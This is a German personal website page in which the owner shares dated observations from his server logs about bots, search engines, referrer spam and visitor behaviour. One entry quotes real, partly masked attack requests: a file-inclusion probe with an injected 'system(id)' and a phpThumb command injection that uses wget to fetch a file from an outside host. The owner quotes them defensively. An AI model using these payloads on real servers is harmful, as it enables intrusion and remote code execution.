Analyse der Log-Datei meiner Website
Bitte wählen:   Start     Login     Wallpapers     Praktisch     Tools     Umfragen     Infos     Blog     Job     Impressum     X  
Statusinfo ⇒   Neuling    TTLsec:5395     Freitag, 14.12.2018     Letzte Änderung: 21.05.2018          
 

Bitte auswählen:
   Bots   
   FAQ   
   Links   
   Big Brother   
   Loganalyse   
   Suchmaschinen   
   Rechtschreibung   

RoBoTom sagt: Hallo Gast, ich bin dein virtueller Begleiter und begrüße dich herzlich beim DiamantNetz.
RoBoTom sagt: Bitte erst LOGIN.

Gast sagt zu  ?
 
 
 
Analyse von Logeinträgen

Wie in der Erklärung zum Datenschutz beschrieben hinterlässt jeder Besucher - egal, ob Mensch oder Maschine - automatisch immer einen Eintrag in der Logdatei jedes Homepage-Providers, sobald er eine beliebige Webseite aufruft.

Dieser Eintrag enthält neben der jeweiligen - weltweit einmaligen - IP-Nummer weitere Daten wie z.B. die gerade aufgerufene Seite, so dass daraufhin eine mehr oder weniger zuverlässige Analyse ermöglicht wird.

Durchsucht der Surfer nun die Seiten einer Website, reihen sich die Einträge in der Logdatei hintereinander. Bei einer Analyse können dann in begrenztem Umfang Rückschlüsse über Probleme beim Aufruf einer Seite erkannt werden. Gleichzeitig ist es aber eben auch möglich, an Erkenntnisse über den Besucher (Mensch oder Robot) zu gelangen.

Um Panik vorzubeugen: Das ist a) etwas völlig Übliches und b) an sich nichts Bedrohliches, denn auch wenn über eine Whois-Abfrage noch ein paar weitere Daten beschafft werden können, bleibt der eigentliche Besucher dennoch anonym, sofern nicht staatliche Maßnahmen aller Art oder schludrige Anbieter beteiligt sind.

Erst wenn ich weiß, was auf meiner Website so abgeht, kann ich rechtzeitig darauf reagieren. Das Design kann optimiert werden, damit meine Gäste Freude am Besuch der Website haben. Die Analyse hilft aber zugleich auch, eine Bedrohung durch Angriffsversuche (momentan durch Bots 1-2 mal pro Woche, also noch im untersten Bereich) zu erkennen.

Um dem interessierten Publikum einen kleinen Einblick in die Welt "unter" dem sichtbaren Internet zu geben, habe ich mich entschlossen, im Folgenden einige meiner Feststellungen aus den Logeinträgen zu veröffentlichen. Natürlich kann ich mit einer Einschätzung auch voll daneben liegen; bilde dir daher immer mit einer gewissen Skepsis deine eigene Meinung.


Erkenntnisse aus der Analyse

Suche mal anders - manchmal ist es doch interessant, in das Error-Log zu schauen. Folgender interessanter Eintrag:
[warn] [client 141.8.147.15] (13)Permission denied: Couldnt read /xxxxxx/.htaccess, closing connection.
Die zugreifende (client) IP habe ich mal zum Namen aufgelöst,
Ergebnis: spider-141-8-147-15.yandex.com. Hm, der russische Spiderbot will also quasi über die Mauer schielen. Tsts, sowas tut (bzw. programmiert) man aber nicht; oder hab ich da was falsch interpretiert ;-) (03.01.2014)


Es ist soweit: IPv6 ist angekommen. Seit etwa einer Woche steigt die Zahl dieser Zugriffe spürbar an. Man erkennt sie am neuen Aufbau der IP-Nummer. Was bisher (IPv4) in der Form "123.456.789.012" daherkam, sieht nun (IPv6) in etwa so aus: "2b02:488:42::50fd:8429". In etwa deswegen, weil der Aufbau differenzierter und damit komplizierter wurde - eine neue Herausforderung für IP-Prüfprogramme :-) (23.07.2012)


Cracker on the run - wohl Dank des steigenden Bekanntheitsgrades meiner Wallpapers glauben jetzt ein paar "pöse Purschen" an ein rentables Angriffsziel, wie folgende (etwas verfremdeten) Logeinträge beispielhaft - faktisch waren es hunderte von verschiedenen Einträgen über ein paar Minuten hinweg - belegen:
218.61.xxx.xxx - - [...] /joomla/index.php?option=com_multiroot&controller=+../proc/self/environ%00 HTTP/1.1 404 2967 - php system(\id\);
218.61.xxx.xxx - - [...] /include/mysql.php?inc_dir=../proc/self/environ%00 HTTP/1.1" 404 2966 - php system(\id\);
91.121.xxx.xxx - - [...] /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr=blur9%20-quality%20%2075%20-interlace%20line%20failer.jpg%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.xx.xxx/f,killall%20 HTTP/1.1 404 2966 - Mozilla/5.0

Und was lernen wir daraus? Wenn möglich niemals die von Installationsprogrammen vorgeschlagenen Standard-Pfadnamen verwenden, lieber was Langes, Kryptisches nehmen. Und auch die Rechtebegrenzung für (externe) Internet-Zugriffe z.B. mittels .htaccess, sollte daher nicht vergessen werden.

Ich selbst sehe diese Art von Angriffen eher sportlich. Sollte es einer wirklich zu arg treiben, bekommt der zuständige Registrar u/o Provider eben mal eine Log-Info. Im übrigen ist meine Website komplett "proprietär", also selbst handgestrickt, ganz ohne CMS, und das Thema Sicherheit (hallo php :-) stand für mich sowieso schon von Anfang an im Vordergrund (Eingabenprüfung, Benutzerverwaltung, Kryptografie, qualifizierter Provider etc.), so ganz einfach kann man es sich hier daher nicht machen. (01.01.2012)


RoBot on the run - mal wieder ein paar typische Bot-Einträge: Erst brav das Icon (.ico) geladen - aber "natürlich" nicht die robots.txt. Dann kamen das zentrale Style-Sheet (.css) und die Index-Datei (Erster Hinweis: davor aber schon die Übersichts-Seite) dran. Danach wurden diverse Hauptseiten nacheinander aufgerufen (Zweiter Hinweis: separat; keine Session-ID im Link mitgeliefert).

Zwischendurch erfolgte immer mal wieder ein (erzwungener) Sprung zur Index-Seite - mein kleiner Gruss an übereifrige RoBots hatte da wohl gearbeitet ;-). Und zum krönenden Abschluss der deutlichste Hinweis: Es wurde die Spezialseite ("RoBots only") aufgerufen, die für Menschen via Browser nicht erkennbar ist. (04.11.2011)


Als Indiz für eine heraufziehende neue mediale Epoche sei folgender Logeintrag, der mir heute erstmalig als "PLAYSTATION" aufgefallen ist, hier festgehalten:
78.54.xxx.xxx - - [...] GET / HTTP/1.1 200 15760 - Mozilla/5.0 (PLAYSTATION 3; 1.00)
(07.10.2011)


RoBot außer Rand und Band - so könnte man die folgenden Logeinträge interpretieren, die ich unlängst vorfand.

Angefangen hat es - bei immer gleicher IP - um 18:17:25 Uhr (man beachte die sich ändernden user agent Daten):
89.0.xxx.xxx - - [...] GET / HTTP/1.1 200 14182 - Mozilla
89.0.xxx.xxx - - [...] GET /robots.txt HTTP/1.1 200 1204 - Java/1.6.0_23
89.0.xxx.xxx - - [...] GET / HTTP/1.1 200 14181 - Mozilla
89.0.xxx.xxx - - [...] GET / HTTP/1.1 200 14181- Java/1.6.0_23

Ebenfalls um 18:17:25 Uhr(!) ging es danach auf bestimmte existierende Dateien los (man beachte die Pfadangaben jeweils am Anfang):
89.0.xxx.xxx - - [...] GET /./rechtschreib.php?... HTTP/1.1 200 11158 - Mozilla
89.0.xxx.xxx - - [...] GET /./wzn/a_infos/faqallg.php HTTP/1.1 404 2966 - Mozilla
89.0.xxx.xxx - - [...] GET /../x_globale/diane.css HTTP/1.1 400 1191 - Mozilla
89.0.xxx.xxx - - [...] GET /./wzn/a_tools/cssallg.php HTTP/1.1 200 12442 - Mozilla

In dieser Art ging es dann mit bis zu 17 Anfragen pro Sekunde eine zeitlang weiter.

Um 18:18:04 Uhr kam dann noch eine zusätzliche Variante hinzu, in folgender Art:
89.0.xxx.xxx - - [...] GET /search?q=site:diamantnetz.de+-Professionelles...&um=1&hl=de&client=news&ie=UTF-8&tbm=isch&source=lnt&... HTTP/1.1 404 2967 - Mozilla

Um 18:21:40 Uhr endete der Spuk dann, so dass auch meine (erwünschten) Besucher ohne unnötige Verzögerung wieder meine Website nutzen konnten. Was das Ganze soll, dürfte auf der Hand liegen: Fuzzy-like wurde getestet, welche Kanäle ins System hineinführen könnten, wohl um dann ggf. später manuell Hand anzulegen. Ähnliches passiert natürlich immer mal wieder, nur dieses Mal war es massiver als sonst, atypischer und daher auffällig. (26.08.2011)


Immer wieder "nett" ist Suchmaschinen-Spam, der durch solche und ähnliche Einträge neue Kunden gewinnen will:
82.165.xxx.xxx - - [...] GET / HTTP/1.0 200 14563 http://privatvideo.YYYxYYY.com/video/?v=Diamantnetz.de
Ich biete zwar keine Videos an und war noch nie auf besagter Site (Adresse ist verfälscht), aber man kann es als RoBot ja trotzdem mal probieren, gell?!
In die gleiche Richtung gehen auch diese Einträge:
174.133.xxx.xxx - - [...] GET / HTTP/1.1 200 14544 http://seekYYYYYY.com/diamantnetz.de Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6)
50.97.xxx.xxx - - [...] GET / HTTP/1.1 200 14544 http://describeYYYYYY.com/diamantnetz.de Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320) diamantnetz.de
(24.06.2011)


Immer mal wieder kommt es vor, dass - meist zweimal - kurz hintereinander die gleiche Seite, jedoch mit unterschiedlicher IP, als Einstiegsseite aufgerufen wird. Die logischste Erklärung dafür scheint mir zu sein, dass sich hier die Effekte des "Social Network" bemerkbar machen: Person 1 sieht die Seite und chattet zu Person 2, dort mal vorbeizuschauen. (20.05.2011)


Man hat schon ein eigenwilliges Gefühl im Magen, wenn man sieht, dass den Zugriffen von IP-Nummer "U" erst ein anderer Zugriff von "C" vorgeht. Dies allerdings auf ein paar Zugriffe von "C" (vermutlich pro Website) begrenzt, bei abnehmender Intensität (vermutlich solange nichts "Kritisches" im Website-Code festgestellt wird). Eine Whois-Recherche ergab dann als IP-Location von "C" eine "network security and network management company" in Kalifornien und als IP-Location von "U" ein "neutrales" deutsches Unternehmen. (15.04.2011)


Nachdem ich in letzter Zeit bombardiert wurde mit gleichartigen Zugriffen von rasch wechselnden IPs, aber immer mit identischem Header und zur selben Seite, in der Art
188.100.xxx.xxx - - [...] GET /wzn/a_umfrage/vorwort.php ... - Mozilla/5.0 (X11; SunOS i86pc; rv:2.0) Gecko/20100101 Firefox/4.0
kam ich ins Grübeln, was das soll. Vielleicht wurde hier durch zeitlich versetztes Einlesen und Vergleichen meiner Seite versucht, zu prüfen, wie häufig sie sich ändert; oder jemand will einfach nur nerven. Nun ja, ich werde versuchen, diesen Sucher aufs "Abstellgleis" zu schicken ;-), so wie die Java-Suchmaschinen (sh. unten). (08.04.2011)


Entgegen meiner bisherigen Annahme, die Besucher wären überwiegend einfach zu faul zum Login, kommt langsam eine weitere Möglichkeit ins Blickfeld, die ich ehrlich gesagt heutzutage nicht mehr erwartet hatte. Bei technischen Themengebieten (Tools) gibt es weniger Widerstand gegen den Login, ebenso bei Anwendungen, die es nicht überall gibt (Ausweis). Dagegen ist der Login bei meinen "Programmen für die Massen" (Gewicht-, Promilletest) eine hohe Anfangshürde.

Entsprechend der jeweiligen "Zielgruppe" könnte man daraus schließen, dass Personen mit einer gewissen Technik-Affinität (oder bei einem leichten Druck ;-) weniger Probleme mit dem Login haben als unerfahrene Personen. Gibt es wirklich noch so viele "ungeübte" User? (25.03.2011)


Die Suchtechnik von Bing hat mein Interesse geweckt. Am Anfang hatte ich aufgrund der Trefferveränderungen irgendwie das Gefühl, Bing könnte bei Google abgekupfert haben - wäre ja auch nicht völlig verwunderlich. Aber inzwischen habe ich den Eindruck, andere Suchaktivitäten wirken sich (positiv) auf die Qualität der Treffer aus. Sind hier möglicherweise Menschen a la Yahoo aktiv? (18.03.2011)


Oberflächlich? Solche Einträge sind es, bei denen ich ins Grübeln komme, was diesen Besucher wohl bewegt hat:
1. Besucher kommt mittels Google-Suche auf die Startseite meines Gewichtstests - fein.
92.78.xxx.xxx - - [...] GET /wzn/a_prakt/bmi.php HTTP/1.1 200 10481 http://www.google.de/search?hl=de&source=hp&q=gewichtstest+kostenlos
2. Besucher setzt einen Link(?) im Google Desktop (den ich selbst nicht nutze) - super, nur warum hat er den Gewichtstest nicht gleich ausprobiert?
92.78.xxx.xxx - - [...] GET /favicon.ico HTTP/1.1 200 1179 - Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
3. Besucher ruft erneut die Startseite des Gewichtstests auf - Verständnisproblem mit dem Login, Spieltrieb, nervöser Zeigefinger?
92.78.xxx.xxx - - [...] POST /wzn/a_prakt/bmi.php?PHPSESSID=... HTTP/1.1 200 10295 http://www.diamantnetz.de/wzn/a_prakt/bmi.php
4. Die Startseite des Tests wird erneut mit gleichem Suchbegriff aufgerufen. Hat der Besucher gerade eine Bewertung via Desktop abgegeben und dadurch einen erneuten Zugriff seitens der Suchmaschine initiiert? Aber warum hat er dann nicht wenigstens den Test ausprobiert??
92.78.xxx.xxx - - [...] GET /wzn/a_prakt/bmi.php HTTP/1.1 200 10295 http://www.google.de/search?hl=de&source=hp&q=gewichtstest+kostenlos
(04.03.2011)


Woran man RoBots erkennt? Ein klares Indiz sind Einträge gleicher IP-Nummer, die u.a. auch die - für menschliche Surfer unsichtbare - Datei robots.txt berücksichtigen. Ein weiteres Indiz ist es, wenn die einzelnen Webseiten in einer für Menschen unlogischen Reihenfolge angesteuert werden oder wenn direkt auf Unterseiten gesprungen wird. (18.02.2011)


Schon ulkig, manche Internet-Suchen bei Google: "wallpaper winter kostenlos" 492.000 Treffer, mein Seitchen Platz 5; "wallpaper winter kostenlos groß" 77,6 Mio. Treffer, meine Site Platz 1 - Überraschung und BIG fun :-)  (31.12.2010)


Immer wieder interessant, wie wiederholende Suchbegriffe zu meiner Site bei Google (s.u.) ca. im Wochenzyklus ihre Position im Ranking leicht ändern. Info: Ich gebe dazu die Abfrage/n lt. Log als Suchbegriff ein. (31.12.2010)


Macht Spass, zu sehen, wie mein kleines, neues Skript dank RegEx dafür sorgt, dass bestimmte (unerwünschte) Java-Bots nun immer zur Bot-Fehlerseite umgeleitet werden. (24.12.2010)


Beeindruckend sind immer wieder die Wege der Google-Suchtechniken (...wird fortgeführt...). Interessant ist aber auch die Tatsache, dass dort ab einem gewissen Grad des Interesses neben den offensichtlich gewerteten Suchbegriffen auch erweiternde Begriffe automatisiert ergänzt werden, da die eingegebenen Suchworte ersichtlich sind:   (17.12.2010)
88.72.xx.xxx - - [...] GET /wzn/a_wall/wallin.php HTTP/1.1 200 http://www.google.de/search?q=desktopbilder+winter&ie=UTF-8


Seit ca. einem Jahr stelle ich Aufrufe durch spezielle Suchmaschinen für mobile Geräte fest, etwa in der Art:
218.213.xxx.xxx - - [...] GET /wzn/a_tools/unico.php HTTP/1.1 200 - DoCoMo/2.0 P900i(c100;TB;W24H11)(compatible; ichiro/mobile goo;+http://help.goo.ne.jp/door/crawler.html) www.diamantnetz.de
(17.12.2010)


Erstaunlich finde ich immer wieder die Besucher meiner Website, die das jeweilige Angebot besuchen, es als Favoriten aufnehmen (84.190.xxx.xxx - - [...] GET /favicon.ico HTTP/1.1 304 - Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/) www.diamantnetz.de), sich aber dann nicht einloggen, um die Funktionsweise zu prüfen. (17.12.2010)


Es ist faszinierend, zu sehen, wie meine Besucher sich gegen den Login wehren, was ja aus den Logeinträgen ersichtlich ist. Langsam komme ich zu der Überzeugung, dass es wohl weniger Mißtrauen als schlichte Faulheit ist. Schade, denn meine Wallpapers, Tools etc. brauchen einen Vergleich mit anderen Angeboten im Internet nicht zu scheuen; ganz im Gegenteil, da ich erkennbare Schwächen der "Konkurrenz" soweit möglich (nicht alle Probleme lassen sich ohne fremde Ressourcen oder umfangreiche Datenbanken lösen) bei meinen Angeboten vermieden habe. (17.12.2010)


Manche Bots sind wirklich miserabel programmiert, wie der folgende Logeintrag zeigt; interessant sind auch die Angaben am Ende:
209.51.xxx.xx - - [...] GET /http://www.diamantnetz.dehttp://www.diamantnetz.dehttp://www.diamantnetz.dehttp://www.diamantnetz.de HTTP/1.0 301 - User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 diamantnetz.net
(17.12.2010)


Die IP-Nummer KANN sich bei JEDEM Seitenaufruf ändern (speziell AOL), wobei in der Regel die ersten drei Abschnitte (Nachtrag 08.04.2011: Manchmal, vermutlich bei Bots oder Angreifern, ändern sich der 3. und 4. Abschnitt) gleich bleiben, nur die Zahlenfolge des vierten Abschnittes der IP-Nummer ändert sich. (10.12.2010)


Mit Java programmierte Suchroboter (wohl aus dem Heimwerker-Bereich) zeichnen sich dadurch aus, dass sie die robots.txt i.d.R. geflissentlich ignorieren. Oder noch cooler: Sie lesen sie und gehen dann erst recht dorthin, wo es verboten wird. (08.12.2010)


Praktisch kein "Cross Selling": Die Besucher kommen mit einem definierten Suchhorizont und sind nur selten bereit, andere Themenbereiche auszuloten. (08.12.2010)